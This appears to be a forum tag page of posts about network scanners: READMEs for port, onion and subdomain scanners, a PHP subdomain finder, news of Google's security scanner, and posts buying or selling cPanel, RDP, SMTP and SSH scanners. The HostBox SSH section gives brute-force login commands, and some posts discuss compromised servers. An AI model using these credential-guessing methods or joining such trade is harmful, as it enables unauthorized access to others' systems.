Showing results for tags 'scanner'.

  1. wget the archive found on my official website: https://rpgfrankfurdro.000webhostapp.com/ I don't think a video or a screenshot is needed for something like this!
  2. URL Dumper is an online SQLi/XSS scanner, used to find XSS and SQL injection vulnerabilities. It supports multiple search engines, a trash system, and more. Features: extracts all page links using regular expressions; XSS scanner (automatically checks every page link); SQL injection scanner (automatically checks every page link); multi-threaded engine; gathers links from search engines (Google/Yahoo/Live Search/Altavista/Terravista); searches the page source with regular expressions; view source (code/browser); trash system; SQLite database for organizing the URLs; proxy server support. Download | Source code
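     As a rough illustration of the regex-based link extraction described above (this is not URL Dumper's code, which isn't shown in the post; just a sketch of the idea in Python), pulling the links out of a fetched page takes only a few lines:

     import re
     import urllib.request

     def extract_links(url):
         # Fetch the page and pull absolute http(s) links out of href attributes
         # with a simple regular expression.
         html = urllib.request.urlopen(url, timeout=10).read().decode("utf-8", "replace")
         return sorted(set(re.findall(r'href=["\'](https?://[^"\']+)', html)))

     for link in extract_links("https://example.com/"):
         print(link)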
  3. fi6s: Fast IPv6 scanner
     fi6s is an IPv6 port scanner designed to be fast. This is achieved by sending and processing raw packets asynchronously. The design and goal are pretty similar to Masscan, though it is not as full-featured yet.
     Building: Building should be fairly easy on up-to-date distros. On Ubuntu 16.04 (xenial) it looks like this:
     # apt install gcc make git libpcap-dev
     $ git clone https://github.com/sfan5/fi6s.git
     $ cd fi6s
     $ make BUILD_TYPE=release
     The scanner executable will be at ./fi6s. Note that fi6s is developed solely on Linux, so it probably won't compile on non-Linux OSes (notably Windows).
     Usage: Usage is pretty easy; fi6s will try to auto-detect the dirty technical details (source/destination MAC, source IP).
     # ./fi6s -p 80,8000-8100 2001:db8::/120
     This example will: scan the 2001:db8::/120 subnet (256 addresses in total); scan port 80 and ports 8000 to 8100 (102 ports in total); output scan results to stdout in the "list" format.
     There are several other ways of specifying an address range to scan; if you aren't sure what's about to happen, invoke fi6s with --echo-hosts and it will print every host that would have been scanned. For advanced features, consult the output of ./fi6s -h.
     Grabbing banners: Since fi6s has its own TCP stack, the OS stack needs to be disabled to avoid interference with banner grabbing (RST packets). This is most easily done using ip6tables and a constant --source-port. Banner grabbing is then enabled by passing --banners:
     # ip6tables -A INPUT -p tcp -m tcp --dport 12345 -j DROP
     # ./fi6s -p 22 --banners --source-port 12345 2001:db8::/120
     Download: fi6s-master.zip or: git clone https://github.com/sfan5/fi6s.git
     Source
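     Not part of fi6s itself, but as a quick way to see what that example command targets, Python's ipaddress module can expand the /120 subnet and the port specification:

     import ipaddress

     subnet = ipaddress.ip_network("2001:db8::/120")   # the example target: 256 addresses
     ports = [80] + list(range(8000, 8101))            # port 80 plus 8000-8100: 102 ports

     print(subnet.num_addresses, "addresses,", len(ports), "ports")
     for addr in list(subnet)[:3]:                     # first few hosts, like --echo-hosts would list
         print(addr)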
  4. Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal Alpine Docker container.
     docker-onion-nmap: Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on Alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests on port 9053. dnsmasq is configured to use localhost:9053 as an authoritative DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests go through Tor and applications can resolve .onion addresses.
     Example:
     $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
     [tor_wait] Wait for Tor to boot... (might take a while)
     [tor_wait] Done. Tor booted.
     [nmap onion] nmap -p 80,443 facebookcorewwwi.onion
     [proxychains] config file found: /etc/proxychains.conf
     [proxychains] preloading /usr/lib/libproxychains4.so
     [proxychains] DLL init: proxychains-ng 4.12
     Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC
     [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK
     [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK
     Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
     Host is up (2.7s latency).
     PORT STATE SERVICE
     80/tcp open http
     443/tcp open https
     Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds
     How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.
     Arguments: By default, args to docker run are passed to /bin/nmap, which calls nmap with the args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this:
     docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
     will be executed as:
     proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion
     In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:
     docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion
     will be executed as:
     proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion
     and
     docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion
     will be executed as:
     proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion
     If you want to call any other command, including the original /usr/bin/nmap, /usr/bin/nc or /usr/bin/curl, you can specify it as the first argument to docker run, e.g.:
     docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion
     Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted connections to Tor while waiting for it to boot). Example:
     $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
     [tor_wait] Wait for Tor to boot... (might take a while)
     [tor_wait retry 0] Check socket is open on localhost:9050...
     [tor_wait retry 0] Socket OPEN on localhost:9050
     [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2)...
     [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
     [tor_wait retry 1] Check socket is open on localhost:9050...
     [tor_wait retry 1] Socket OPEN on localhost:9050
     [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4)...
     [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
     [tor_wait retry 2] Check socket is open on localhost:9050...
     [tor_wait retry 2] Socket OPEN on localhost:9050
     [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6)...
     [tor_wait retry 2] SOCKS proxy UP on localhost:9050
     [tor_wait] Done. Tor booted.
     [nmap onion] nmap -p 80,443 facebookcorewwwi.onion
     (remaining output identical to the first example: host up with 2.8s latency, ports 80 and 443 open, scan finished in 4.05 seconds)
     Notes: No UDP is available over Tor. Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap.
     gr33tz: @jessfraz tor-proxy, @zuazo alpine-tor-docker, shellhacks, crypto-rebels.de
     Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git
     Source
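     The tor_wait polling shown in that log can be approximated in a few lines; this is only a sketch of the idea in Python (the image's actual tor_wait is a shell script, not reproduced here): open the SOCKS port, send a minimal SOCKS5 greeting, and retry until Tor answers.

     import socket
     import time

     def socks5_ready(host="127.0.0.1", port=9050, timeout=2):
         # Connect to the SOCKS port and offer "no authentication"; a real
         # SOCKS5 server replies with version byte 0x05.
         try:
             with socket.create_connection((host, port), timeout=timeout) as s:
                 s.sendall(b"\x05\x01\x00")
                 return s.recv(2)[:1] == b"\x05"
         except OSError:
             return False

     for attempt in range(10):
         if socks5_ready():
             print("Tor SOCKS proxy is up")
             break
         print("retry %d: SOCKS proxy not ready yet" % attempt)
         time.sleep(2)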
  5. Inventus
     Inventus is a spider designed to find subdomains of a specific domain by crawling it and any subdomains it discovers. It's a Scrapy spider, meaning it's easily modified and extended to suit your needs.
     Demo: https://asciinema.org/a/PGIeEpEwZTUdgxrolBpCjljHL#
     Requirements: Linux (I haven't tested this on Windows), Python 2.7 or Python 3.3+, Scrapy 1.4.0 or above.
     Installation: Inventus requires Scrapy to be installed before it can be run. First, clone the repo and enter it:
     $ git clone https://github.com/nmalcolm/Inventus
     $ cd Inventus
     Now install the required dependencies using pip:
     $ pip install -r requirements.txt
     Assuming the installation succeeded, Inventus should be ready to use.
     Usage: The most basic usage of Inventus is as follows:
     $ cd Inventus
     $ scrapy crawl inventus -a domain=facebook.com
     This tells Scrapy which spider to use ("inventus" in this case) and passes the domain to the spider. Any subdomains found will be sent to STDOUT. The other custom parameter is subdomain_limit, which sets a maximum number of subdomains to discover before quitting. The default value is 10000, but it isn't a hard limit.
     $ scrapy crawl inventus -a domain=facebook.com -a subdomain_limit=100
     Exporting: Exporting data can be done in multiple ways. The easiest way is redirecting STDOUT to a file:
     $ scrapy crawl inventus -a domain=facebook.com > facebook.txt
     Scrapy has a built-in feature which allows you to export items into various formats, including CSV, JSON, and XML. Currently only subdomains are exported, though this may change in the future.
     $ scrapy crawl inventus -a domain=facebook.com -t csv -o Facebook.csv
     Configuration: Inventus's behaviour can be configured. By default it ignores robots.txt, has a 30 second timeout, caches crawl data for 24 hours, has a crawl depth of 5, and uses Scrapy's AutoThrottle extension. These and more can all be changed by editing the inventus_spider/settings.py file. Scrapy's settings are well documented too.
     Bugs/Suggestions/Feedback: Feel free to open a new issue for any of the above. Inventus was built in only a few hours and will likely contain bugs. You can also connect with me on Twitter.
     License: Released under the MIT License. See LICENSE.
     Download: Inventus-master.zip or git clone https://github.com/nmalcolm/Inventus.git
     Source
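     For readers who haven't used Scrapy, a stripped-down spider along the same lines looks like this (a sketch of the idea only, not Inventus's own code; the class name and regex are made up for illustration):

     import re
     import scrapy

     class SubdomainSketchSpider(scrapy.Spider):
         name = "subdomain_sketch"

         def __init__(self, domain=None, *args, **kwargs):
             super().__init__(*args, **kwargs)
             self.domain = domain
             self.allowed_domains = [domain]        # Scrapy also allows subdomains of this
             self.start_urls = ["http://%s/" % domain]
             self.seen = set()

         def parse(self, response):
             # Record every subdomain of the target seen in the page source.
             pattern = re.compile(r"https?://([\w.-]+\." + re.escape(self.domain) + ")")
             for match in pattern.finditer(response.text):
                 sub = match.group(1)
                 if sub not in self.seen:
                     self.seen.add(sub)
                     yield {"subdomain": sub}
             # Keep crawling by following every link on the page.
             for href in response.css("a::attr(href)").extract():
                 yield response.follow(href, callback=self.parse)

     Something like "scrapy runspider subdomain_sketch.py -a domain=example.com -o subs.json" would run it and export what it finds.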
  6. Can anyone help me out with a few scanners?
  7. Which is the best cPanel scanner?
  8. Hi! Can someone help me figure out how to scan? Thank you.
  9. Vulnerability scanner for Linux, agentless, written in golang. https://github.com/future-architect/vuls
  10. I found a Linux SMTP scanner and thought I'd post it. I don't know how it works; I saw that it pulls SMTPs both from email and from IP... maybe you can enlighten me too. Fastupload.ro - fast online file transfer
  11. Hello, below is an SSH (port 22) scanner. It's old, but it still does the job: explorer.eu5.org/scanner.jpg Sorry, the FTP was no longer active.
  12. Buying a SOCKS 4/5 scanner (privately made). It must be written in Python and scan by IP range or IP class; ports 1080 and 80 are excluded. I'm waiting for offers via PM. Kids/new users please refrain; I only deal with users who have a reputation. Thank you.
  13. https://www.sendspace.com/file/kogvti
  14. Hi, I just got a root and noticed it's not that great for flooding, so I thought I'd turn it into a scanner, but I don't have a scanner. :) I've used unixcod but I don't really understand it. Does anyone know a better one? Thank you.
  15. HostBox SSH is an SSH password/account scanner written in Python.
     README
     2.0 Install
     Installing wxPython: http://wiki.wxpython.org/InstallingOnUbuntuOrDebian
     Installing Paramiko: sudo apt-get install python-paramiko
     3.0 Usage
     To run HostBox in GUI mode: ./HostBox-SSH.py should start the GUI; alternatively try "python HostBox-SSH.py" or "chmod +x HostBox-SSH.py && ./HostBox-SSH.py".
     To run HostBox in console mode: ./HostBox-SSH -h for help with command line options.
     Command line options: HostBox-SSH.py -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f]
     Username options: -u user1,user2,user3.. || --ufile=usernames.txt
     Password options: -p pass1,pass2,pass3.. || --pfile=passwords.txt
     Break options: -1: break on account login; -2: break on server login
     Speed options: -n for normal scan || -f for fast scan mode
     Examples:
     ./HostBox.py -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n
     This runs HostBox with usernames and password settings given on the command line. -1 means break account testing when a login is found for that account; -n means normal scan speed.
     ./HostBox.py -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f
     This runs HostBox with usernames and passwords read from text files. -2 means the scanner stops testing a server when a login is found for that server; -f selects fast (multithreaded) scan mode.
     "-username" and "blank" in the username/password spec tell the scanner to use the username as the password / check for blank passwords.
     VISIT OSKAR STRIDSMAN'S IT RESOURCE -- StridsmanIT.wordpress.com -- HostBox-SSH 0.2
     REPORT BUGS TO: https://stridsmanit.wordpress.com/ssh-scanner/
     Download HostBox SSH 0.2 | Packet Storm
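     At its core this kind of scanner performs one paramiko login attempt per username/password pair; a minimal sketch of that single check (not HostBox's own code, and only for auditing hosts you are authorized to test) looks like this:

     import paramiko

     def try_login(host, username, password, port=22, timeout=5):
         # Returns True if the credentials are accepted, False if rejected,
         # and None if the host could not be reached.
         client = paramiko.SSHClient()
         client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
         try:
             client.connect(host, port=port, username=username, password=password,
                            timeout=timeout, allow_agent=False, look_for_keys=False)
             return True
         except paramiko.AuthenticationException:
             return False
         except (paramiko.SSHException, OSError):
             return None
         finally:
             client.close()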
  16. rukov

    SSH Scanner

    Download https://mega.co.nz/#!gR5R0IyL!UPdmJoMBPt0i3G58AZDYPa7sk7isFhQ8c77DinvZwwI
  17. MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. It can also do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file, and it can bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for the filter_wrapup callback. Various bug fixes, a typo fixed, and all Perl function prototypes removed. Download Site: MIMEDefang
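     MIMEDefang's own filters are written in Perl against its milter API; purely to illustrate the kind of MIME rewriting described above, here is the concept in Python (the blocked extensions and function name are made up for the example, and only top-level parts are handled for brevity):

     from email import message_from_bytes
     from email.mime.text import MIMEText

     BLOCKED = (".exe", ".scr", ".pif", ".bat")

     def strip_bad_attachments(raw_bytes):
         # Replace unacceptable attachments with a short text notice,
         # leaving the rest of the message intact.
         msg = message_from_bytes(raw_bytes)
         if not msg.is_multipart():
             return msg
         kept = []
         for part in msg.get_payload():
             name = (part.get_filename() or "").lower()
             if name.endswith(BLOCKED):
                 kept.append(MIMEText("[attachment %s removed by policy]\n" % name))
             else:
                 kept.append(part)
         msg.set_payload(kept)
         return msg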
  18. Because a few days ago I needed to... scan an IP for open ports, and because I didn't want to use the tools already available online, I "played around" a bit. And since "sharing is good", I'm posting the program and the source code for anyone who needs a multithreaded TCP scanner. The compiled executable can be downloaded here. The source code (a Visual Studio 2013 project) can be downloaded here. Enjoy!
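     The linked build is a Visual Studio 2013 project and its source isn't reproduced in the post; as a rough sketch of the same idea (a multithreaded TCP connect scanner), the equivalent in Python looks like this:

     import socket
     from concurrent.futures import ThreadPoolExecutor

     def check_port(host, port, timeout=1.0):
         # A TCP connect scan: the port is open if the connection succeeds.
         try:
             with socket.create_connection((host, port), timeout=timeout):
                 return port, True
         except OSError:
             return port, False

     def scan(host, ports, workers=100):
         with ThreadPoolExecutor(max_workers=workers) as pool:
             for port, is_open in pool.map(lambda p: check_port(host, p), ports):
                 if is_open:
                     print("%s:%d open" % (host, port))

     if __name__ == "__main__":
         scan("127.0.0.1", range(1, 1025))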
  19. SSH GOSH SCANNER! I found it on a VPS; I don't know anything about it! GOSH
  20. <?php
     /* Bing SubDomain Scanner By injector_ma */
     error_reporting(0);
     set_time_limit(0);

     if (!function_exists("curl_exec"))
         die("Fatal Error : cURL Extension is not Installed...\n");

     $domain = $argv[1];

     echo "Bing SubDomain Scanner By injector_ma\n"; // (ASCII-art banner in the original post)

     $found = Bingsub($domain);
     if (count($found) == 0) {
         // Nothing came back from Bing: fall back to a small wordlist brute force.
         $subs = array(
             "app","apps","cpanel","ftp","mail","mysql","webmail","smtp","pop","pop3","direct-connect",
             "direct-connect-mail","record","ssl","dns","help","blog","forum","doc","home","shop",
             "vb","www","web","webadmin","weblog","webmail","webmaster","webservices","webserver",
             "log","logs","images","lab","ftpd","docs","download","downloads","about","backup",
             "chat","data","smtp","upload","uploads","ns1","ns2","record","ssl","imap","result",
             "vip","demo","beta","video"
         );
         echo "\n\t\tNothing Found. Start Using Brute Force Method ...\n\n";
         foreach ($subs as $sub) {
             $check = @fsockopen("$sub.$domain", 80);
             if ($check) {
                 echo "$sub.$domain : " . gethostbyname("$sub.$domain") . " \n\n";
                 $save = fopen('subdomains.txt', 'ab');
                 fwrite($save, "http://$sub.$domain\r\n");
                 fclose($save);
             }
         }
     } else {
         foreach ($found as $sub) {
             echo $sub . " : " . gethostbyname($sub) . "\r\n";
             $save = fopen('subdomains.txt', 'ab');
             fwrite($save, "http://" . $sub . "\r\n");
             fclose($save);
         }
     }

     function Bingsub($domain) {
         // Page through Bing results for "domain:<target>" and collect the hosts.
         $urls = array();
         for ($i = 1; $i <= 1000; $i += 10) {
             $gt = curlreq("http://www.bing.com/search?q=" . urlencode("domain:$domain") . "&first=$i",
                           "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
             if (preg_match_all('#<h2><a href="(.*?)"#i', $gt, $matches)) {
                 foreach ($matches[1] as $match) {
                     $urls[] = cleanme($match);
                 }
             }
             if (!preg_match('#class="sb_pagN"#', $gt)) break; // no "next page" link
         }
         return array_unique($urls);
     }

     function cleanme($link) {
         return str_replace("www.", "", parse_url($link, PHP_URL_HOST));
     }

     function curlreq($url, $user_agent, $proxy = FALSE, $post = FALSE) {
         // The body of this helper was truncated in the original post; rebuilt
         // here as a plausible cURL GET/POST request function.
         $ch = curl_init($url);
         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
         curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
         if ($proxy) curl_setopt($ch, CURLOPT_PROXY, $proxy);
         if ($post) {
             curl_setopt($ch, CURLOPT_POST, true);
             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
         }
         $source = curl_exec($ch);
         curl_close($ch);
         return $source;
     }
     Source
  21. Looking for a nologin scanner; I'm waiting for offers!
  22. Buying an RDP scanner, for Linux or Windows, as long as it's reasonably good and catches at least 20-30 good RDPs per day! Add: cryptbymme!
  23. Google on Thursday unleashed its own free web application vulnerability scanner, which the search engine giant calls Google Cloud Security Scanner, to scan developers' applications on its cloud platform for common security vulnerabilities more effectively.
     SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES
     Google launched the Google Cloud Security Scanner in beta. The new web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) and mixed content scripts.
     Although several free web application vulnerability scanners and vulnerability assessment tools are available on the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for the web application developers who run their apps on Google App Engine, whereas Google Cloud Security Scanner is meant to be easier for web application developers to use. It scans for Cross-Site Scripting (XSS) and mixed content script flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face.
     Today's HTML5- and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site.
     GO FOR WEB VULNERABILITY SCAN NOW
     Developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources.
     Google notes that there are two typical approaches to such security scans:
     Parse the HTML and emulate a browser. This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations.
     Use a real browser. This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and the time needed for the DOM to settle.
     Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a maximum rate of 20 requests per second, so that target sites won't be overloaded.
     The search engine giant still recommends that developers get a manual security review from a web app security professional, just to be on the safe side, but the company hopes its vulnerability scanner will provide a simple solution to the most common App Engine issues with minimal false positives.
     Source
  24. Selling private scanners: cPanel scanner - price $90; SMTP scanner - price $50; VNC scanner - price $30. Payment via PerfectMoney, WMZ, or a top-up code.